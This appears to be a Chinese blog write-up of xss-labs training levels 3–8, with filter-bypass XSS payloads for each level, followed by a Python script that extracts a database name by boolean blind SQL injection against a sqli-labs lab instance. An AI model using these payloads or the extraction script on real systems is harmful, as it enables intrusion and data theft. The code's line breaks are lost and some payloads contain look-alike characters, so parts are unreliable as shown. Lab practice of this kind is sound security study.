当前位置: 首页 > news >正文

xss-labs练习

第三关

尝试输入">进行闭合操作,发现被">都被实体化了。

继续尝试输入单引号进行闭合,发现可以正常闭合value值

因为">都被实体化,所以考虑使用HTML事件进行绕过

这里使用onkeydown事件进行绕过

payload:'οnkeydοwn='alert(123)

当在输入框按下按键后即可过关

第四关

还是输入">尝试闭合,可以看到直接成功

 后续和第三关同理

payload:"οnclick="alert(123)

第五关

依旧先尝试闭合,可以看到,使用">即可闭合

使用与三四关相同的方法进行尝试,发现无法绕过了

观察可知,代码中将on过滤为o_n,且大小写都无法绕过

换一个方法,可以使用JavaScript的伪协议进行尝试

payload:"><a href=javascript:alert(123)>

第六关

依旧先尝试闭合,可以看到,">成功闭合

尝试使用前面几关的方法,发现在使用伪协议时的href被替换为了hr_ef,尝试使用大小写绕过,发现大写后可以成功绕过

payload:"><a HREF=javascript:alert(123)>

第七关

依旧先尝试闭合,使用">闭合成功

尝试使用JavaScript伪协议,发现href和script无论大小写都会被过滤

尝试将href和script都进行编码绕过,发现只有script能够被成功解码,最终绕过失败

因为他会直接将href和script替换为空,所以尝试双写绕过,发现可以成功

payload:"><a hrehreff=javascrscriptipt:alert(123)>

第八关

使用">进行闭合的尝试,发现被实体化了。

但是发现它会将输入的语句直接放在<a>标签中,尝试使用JavaScript伪协议进行绕过。

使用伪协议发现script被打乱,尝试将script编码绕过

可以看到编码后的script成功绕过

payload:java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(123)

sqli第八关使用二分查找进行优化

import requestsurl = "http://10.100.187.164/sqli-labs-php7-master/Less-8/"
success_indicator = "You are in..........."  # 页面中的成功标识# 使用二分查找推断数据库名的长度
def get_database_length():low, high = 1, 50  # 假设数据库名长度在1到50之间while low <= high:mid = (low + high) // 2payload_gt = f"1' AND (SELECT LENGTH(database())) > {mid} -- "response_gt = requests.get(url, params={"id": payload_gt})if success_indicator in response_gt.text:  # 长度大于midlow = mid + 1else:payload_eq = f"1' AND (SELECT LENGTH(database())) = {mid} -- "response_eq = requests.get(url, params={"id": payload_eq})if success_indicator in response_eq.text:  # 长度等于midreturn midelse:  # 长度小于midhigh = mid - 1return 0  # 未找到长度# 使用二分查找推断数据库名
def get_database_name(length):db_name = ""for i in range(1, length + 1):low, high = 0, 127  # ASCII码范围char = Nonewhile low <= high:mid = (low + high) // 2payload_gt = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1))) > {mid} -- "response_gt = requests.get(url, params={"id": payload_gt})if success_indicator in response_gt.text:low = mid + 1  # 字符大于mid,调整下界else:payload_eq = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1))) = {mid} -- "response_eq = requests.get(url, params={"id": payload_eq})if success_indicator in response_eq.text:char = chr(mid)  # 找到字符breakelse:high = mid - 1  # 字符小于mid,调整上界if char:db_name += charelse:db_name += '?'  # 未识别字符占位符print(f"Warning: Character at position {i} not found")return db_name# 主函数
if __name__ == "__main__":test_payload = "1' AND 1=1 -- "test_response = requests.get(url, params={"id": test_payload})length = get_database_length()if length > 0:print(f"数据库长度: {length}")db_name = get_database_name(length)print(f"数据库名称: {db_name}")else:print("无法确定数据库长度")
http://www.dtcms.com/a/281953.html

相关文章:

  • 「源力觉醒 创作者计划」_巅峰对话:文心大模型4.5系列与DeepSeek/Qwen 3.0深度解析
  • React -自定义hooks - 封装双向数据绑定
  • 【NLP舆情分析】基于python微博舆情分析可视化系统(flask+pandas+echarts) 视频教程 - 微博类别信息爬取
  • 在 Spring Boot 中监控异步任务的执行情况
  • Flask 项目结构
  • Flask的基本概念
  • Ray集群部署与维护
  • 显示器如何突破 DisplayPort 1.4 的带宽限制,显示更高的分辨率刷新率
  • 网络劫持对用户隐私安全有何影响?
  • python fonttools字体多语言解析
  • iOS 上架被拒 4.3a 【Cocos全面解读】
  • iOS App 上架流程优化指南 工具组合与常见问题处理经验总结
  • 用AI做带货视频评论分析进阶提分【Datawhale AI 夏令营】
  • 插板式系统的“生命线“:EtherCAT分布式供电该如何实现?
  • RoMa: Robust Dense Feature Matching论文精读(逐段解析)
  • docker 安装rabbitmq
  • 【C#】实体类定义的是long和值识别到的是Int64,实体类反射容易出现Object does not match target type
  • 【电脑】显示器的基础知识
  • 微服务相关问题(2)
  • 【前端Vue】this.resetForm(“form“)重置表单时出现indexOf报错的解决方案
  • GraphQL与REST在微服务接口设计中的对比分析与实践
  • Vue 3 中调用子组件方法
  • Linux-局域网构建+VLAN 划分 + 端口 MAC-IP 绑定 + 静态 DHCP
  • 基于MATLAB的k近邻KNN的数据分类预测方法应用
  • ArcGISPro应用指南:使用ArcGIS Pro创建与优化H3六边形网格
  • 深度剖析 TDMQ RabbitMQ 版经典队列底层存储机制
  • 【C# in .NET】11. 探秘泛型:类型参数化革命
  • C++ 面向对象
  • 滚珠导轨在封装设备如何体现高精度运行?
  • 创建linux端口映射连接小网